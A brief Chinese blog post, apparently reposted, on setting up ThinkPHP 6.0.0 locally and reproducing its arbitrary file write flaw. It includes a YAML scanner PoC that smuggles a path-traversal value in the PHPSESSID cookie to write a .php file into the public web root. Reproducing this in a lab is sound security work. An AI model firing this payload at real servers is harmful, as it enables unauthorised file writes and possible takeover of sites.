【一分钟】ThinkPHP v6.0 (poc-yaml-thinkphp-v6-file-write)环境复现及poc解析

2023-12-28 15:50:55

写在前面

一分钟表示是非常短的文章,只会做简单的描述。旨在用较短的时间获取有用的信息

环境下载

官方环境下载器:https://getcomposer.org/Composer-Setup.exe
下载文档时可以设置代理,不然下载不上,你懂的
在这里插入图片描述
下载成功
cmd cd 进入到你的www文件下
(在那里打开终端也行)
执行如下命令

composer create-project topthink/think tp60

在这里插入图片描述
下载完成后,进入tp60文件夹
找到该项目下的composer.json
更改这个位置,版本为6.0.0
在这里插入图片描述
重新在该位置使用composer update
在这里插入图片描述
在当前位置继续使用php think run
在这里插入图片描述
开启成功
在这里插入图片描述
利用之前还需要开启session
app/middleware.php 开启session功能
在这里插入图片描述
poc链接:https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
ThinkPHP6任意文件操作漏洞,影响版本ThinkPHP6.0.0-6.0.1

name: poc-yaml-thinkphp-v6-file-write
set:
  f1: randomInt(800000000, 900000000)
rules:
  - method: GET
    path: /{{f1}}.php
    follow_redirects: true
    expression: |
      response.status == 404
  - method: GET
    path: /
    headers:
      Cookie: PHPSESSID=../../../../public/{{f1}}.php
    follow_redirects: true
    expression: |
      response.status == 200 && "set-cookie" in response.headers && response.headers["set-cookie"].bcontains(string(f1))
  - method: GET
    path: /{{f1}}.php
    follow_redirects: true
    expression: |
      response.status == 200 && response.content_type.bcontains(b"text/html")
detail:
  author: Loneyer
  Affected Version: "Thinkphp 6.0.0"
  links:
    - https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write

在这里插入图片描述
写入成功:
在这里插入图片描述

文章来源:https://blog.csdn.net/bin789456/article/details/122540648
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。